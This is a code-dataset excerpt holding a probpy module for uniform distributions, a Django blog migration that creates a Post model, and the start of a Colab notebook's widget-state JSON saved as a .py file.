c6a7fbd32d85a9e5f274cc76bf525b7c4eb7bf77 | 33febf8b617ef66d7086765f1c0bf6523667a959 | /probpy/distributions/uniform.py | 3b06514b722dc180d8f041489b3cc970add316b3 | [] | no_license | JonasRSV/probpy | 857201c7f122461463b75d63e5c688e011615292 | 5203063db612b2b2bc0434a7f2a02c9d2e27ed6a | refs/heads/master | 2022-07-07T06:17:44.504570 | 2020-04-15T14:52:20 | 2020-04-15T14:52:20 | 245,820,195 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,578 | py | import numpy as np
import numba
from typing import Tuple
from probpy.core import Distribution, RandomVariable, Parameter
class Uniform(Distribution):
"""Uniform Distribution"""
a = "a"
b = "b"
@classmethod
def med(cls, a: np.float = None, b: np.float = None) -> RandomVariable:
"""
:param a: lower bound
:param b: upper bound
:return: RandomVariable
"""
if a is None and b is None:
_sample = Uniform.sample
_p = Uniform.p
elif a is None:
def _sample(a: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray, a: np.ndarray): return Uniform.p(x, a, b)
elif b is None:
def _sample(b: np.ndarray, size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray, b: np.ndarray): return Uniform.p(x, a, b)
else:
def _sample(size: int = 1): return Uniform.sample(a, b, size)
def _p(x: np.ndarray): return Uniform.p(x, a, b)
parameters = {
Uniform.a: Parameter((), a),
Uniform.b: Parameter((), b)
}
return RandomVariable(_sample, _p, shape=(), parameters=parameters, cls=cls)
@staticmethod
@numba.jit(nopython=False, forceobj=True)
def sample(a: np.float, b: np.float, size: int = 1) -> np.ndarray:
return np.array(a + np.random.rand(size) * (b - a))
@staticmethod
@numba.jit(nopython=True, forceobj=False)
def fast_p(x: np.ndarray, a: np.float, b: np.float):
return ((a < x) & (x < b)) / (b - a)
@staticmethod
def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
if type(x) != np.ndarray: x = np.array(x)
if type(a) != np.ndarray: a = np.array(a)
if type(b) != np.ndarray: b = np.array(b)
return Uniform.fast_p(x, a, b)
@staticmethod
def jit_probability(rv: RandomVariable):
a = rv.parameters[Uniform.a].value
b = rv.parameters[Uniform.b].value
_fast_p = Uniform.fast_p
if a is None and b is None:
return _fast_p
elif a is None:
def fast_p(x: np.ndarray, a: np.float):
return _fast_p(x, a, b)
elif b is None:
def fast_p(x: np.ndarray, b: np.float):
return _fast_p(x, a, b)
else:
def fast_p(x: np.ndarray):
return _fast_p(x, a, b)
fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
return fast_p
class MultiVariateUniform(Distribution):
"""Multivariate Uniform distribution"""
a = "a"
b = "b"
@classmethod
def med(cls, a: np.ndarray = None, b: np.ndarray = None, dimension: Tuple = None) -> RandomVariable:
"""
:param a: lower bound
:param b: upper bound
:param dimension: dimension of r.v
:return: RandomVariable
"""
if a is None and b is None:
_sample = MultiVariateUniform.sample
_p = MultiVariateUniform.p
shape = dimension
elif a is None:
def _sample(a: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray, a: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = b.size
elif b is None:
def _sample(b: np.ndarray, size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray, b: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = a.size
else:
def _sample(size: int = 1): return MultiVariateUniform.sample(a, b, size)
def _p(x: np.ndarray): return MultiVariateUniform.p(x, a, b)
shape = a.size
parameters = {
MultiVariateUniform.a: Parameter(shape, a),
MultiVariateUniform.b: Parameter(shape, b)
}
return RandomVariable(_sample, _p, shape=shape, parameters=parameters, cls=cls)
@staticmethod
def sample(a: np.ndarray, b: np.ndarray, size: int = 1) -> np.ndarray:
return a + np.random.rand(size, a.size) * (b - a)
@staticmethod
@numba.jit(nopython=True, fastmath=True, forceobj=False)
def fast_p(x: np.ndarray, a: np.ndarray, b: np.ndarray):
indicator_matrix = ((a < x) & (x < b))
indicator_vector = np.array([np.all(indicator_matrix[i]) for i in range(len(x))])
probability = 1 / np.prod(b - a)
return indicator_vector * probability
@staticmethod
def p(x: np.ndarray, a: np.ndarray, b: np.ndarray) -> np.ndarray:
if type(x) != np.ndarray: x = np.array(x)
if type(a) != np.ndarray: a = np.array(a)
if type(b) != np.ndarray: b = np.array(b)
if x.ndim == 1: x = x.reshape(-1, a.size)
return MultiVariateUniform.fast_p(x, a, b)
@staticmethod
def jit_probability(rv: RandomVariable):
a = rv.parameters[Uniform.a].value
b = rv.parameters[Uniform.b].value
_fast_p = MultiVariateUniform.fast_p
if a is None and b is None:
return _fast_p
elif a is None:
def fast_p(x: np.ndarray, a: np.float):
return _fast_p(x, a, b)
elif b is None:
def fast_p(x: np.ndarray, b: np.float):
return _fast_p(x, a, b)
else:
def fast_p(x: np.ndarray):
return _fast_p(x, a, b)
fast_p = numba.jit(nopython=True, forceobj=False, fastmath=True)(fast_p)
return fast_p
| [
"jonas@valfridsson.net"
] | jonas@valfridsson.net |
c8262985ee77ab6c81a16c4b23acecf04caaa553 | aace0da1ccc63780757c6b4e9dd88b87f0a2591b | /blog/migrations/0001_initial.py | 944d822291573755826e61cb34baf6c65e44d3c8 | [] | no_license | mairacosta/djangogirls-tutorial | cba1dfacd69eb8a212718882085b19a276ddddd2 | f3da5b20284cab8dda53edab023ea4cedbbb13bc | refs/heads/master | 2022-12-28T05:12:34.932219 | 2020-10-08T20:38:01 | 2020-10-08T20:38:01 | 300,419,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | # Generated by Django 3.1 on 2020-09-29 19:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"maira_mcs@hotmail.com"
] | maira_mcs@hotmail.com |
95c4d95e6b0e37459bd1811c64cfdb080c568dad | 13d1d744d0b7ff8854e7328c03900458a9ecfe2a | /final.py | bbe9ae3ed2b83253e3a4cbc07ff3a9744bd25b18 | [] | no_license | samyuktha-12/Aug2021-contest | 9fcb430dc45d33a90692bf83930c3e346f5f6dc6 | 58863d9fd31a3bba2a055b206cd95c01e656accb | refs/heads/main | 2023-07-04T18:36:22.736175 | 2021-08-22T02:46:31 | 2021-08-22T02:46:31 | 397,106,191 | 2 | 0 | null | 2021-08-17T05:01:33 | 2021-08-17T05:01:32 | null | UTF-8 | Python | false | false | 76,889 | py | {
"nbformat": 4,
"nbformat_minor": 0,
"metadata": {
"colab": {
"name": "final.ipynb",
"provenance": [],
"collapsed_sections": [],
"authorship_tag": "ABX9TyPNfNHc6LfWu9Tl25akcsB8",
"include_colab_link": true
},
"kernelspec": {
"display_name": "Python 3",
"name": "python3"
},
"language_info": {
"name": "python"
},
"accelerator": "GPU",
"widgets": {
"application/vnd.jupyter.widget-state+json": {
"6389fd3f3dc44050a610f69ab5e6a180": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_e86b2bbb520d4af990e84769814bbea5",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_42cacbc4410c4cd5861b324e9122fff7",
"IPY_MODEL_ee6e111cae584dccb59e4a18fe5996e9",
"IPY_MODEL_a64dcbd7f61c48dfa7d6fdd68d8c1758"
]
}
},
"e86b2bbb520d4af990e84769814bbea5": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"42cacbc4410c4cd5861b324e9122fff7": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_8cd6b59399bb4f6b9419273713208fe2",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_11b917db556441efb01f932916060f0b"
}
},
"ee6e111cae584dccb59e4a18fe5996e9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_ef5d24a03aca43a1ae8a12e60a6149f0",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 1429,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 1429,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_156c24ba6f3c40a8aa7cbe915e1c5ed5"
}
},
"a64dcbd7f61c48dfa7d6fdd68d8c1758": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_0a80dd64f7454aad8e249a57f13b7cf5",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 1.43k/1.43k [00:00<00:00, 26.9kB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6408458000104746a888b5b7d1bb3992"
}
},
"8cd6b59399bb4f6b9419273713208fe2": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"11b917db556441efb01f932916060f0b": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"ef5d24a03aca43a1ae8a12e60a6149f0": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"156c24ba6f3c40a8aa7cbe915e1c5ed5": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"0a80dd64f7454aad8e249a57f13b7cf5": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"6408458000104746a888b5b7d1bb3992": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"d13dbb8559ba40a9a2f9dc7f0f5ea40d": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_f51970b3c1c549a69c51de95909e2105",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_6f57dcc2e6514dc593020a36a812dd2d",
"IPY_MODEL_18975982ec1e4de8b4f0c665364926ba",
"IPY_MODEL_7fbfeabe51a14620a520cb5cbba15945"
]
}
},
"f51970b3c1c549a69c51de95909e2105": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"6f57dcc2e6514dc593020a36a812dd2d": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_dead2cfeeb9541e6b63a3e17327b8b85",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6091e5ed880b4342aeee6fab8ee77dad"
}
},
"18975982ec1e4de8b4f0c665364926ba": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_730d7b36b5254c1a9a6e97d429f7c083",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 2444714899,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 2444714899,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_d41435a1cc8d49119664466716ac5a9c"
}
},
"7fbfeabe51a14620a520cb5cbba15945": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_5ddb070811d04b2891ffaaaff381cc1c",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 2.44G/2.44G [01:12<00:00, 36.5MB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_609284e60209444fb1a86f5d803d16b1"
}
},
"dead2cfeeb9541e6b63a3e17327b8b85": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"6091e5ed880b4342aeee6fab8ee77dad": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"730d7b36b5254c1a9a6e97d429f7c083": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"d41435a1cc8d49119664466716ac5a9c": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"5ddb070811d04b2891ffaaaff381cc1c": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"609284e60209444fb1a86f5d803d16b1": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"d8ddbf1f4d33471cbb4a45f2a82c830e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_0ded282a4598481db2831db11c45cc06",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_0e98a3fb81be4eb7be56f6c54f3453eb",
"IPY_MODEL_1ad806b735cb4b7b83b63dfff1009cb1",
"IPY_MODEL_877fdb214729497c8756a82ff97208f2"
]
}
},
"0ded282a4598481db2831db11c45cc06": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"0e98a3fb81be4eb7be56f6c54f3453eb": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_17dea81fe42a4d31b5239dec9cfbf446",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6583cc2d5bb0439e8c3d6f4d607dfb7e"
}
},
"1ad806b735cb4b7b83b63dfff1009cb1": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_a8bc0bade21b4715a5dc62594a16d0c9",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 529,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 529,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6e9b9d7ca93540bba92c33b4fd9f295e"
}
},
"877fdb214729497c8756a82ff97208f2": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_3cc33b5d60f641d5bc81eb6f60bfcd1e",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 529/529 [00:00<00:00, 13.6kB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_847c55b3901f4601803dd31828cffc93"
}
},
"17dea81fe42a4d31b5239dec9cfbf446": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"6583cc2d5bb0439e8c3d6f4d607dfb7e": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"a8bc0bade21b4715a5dc62594a16d0c9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"6e9b9d7ca93540bba92c33b4fd9f295e": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
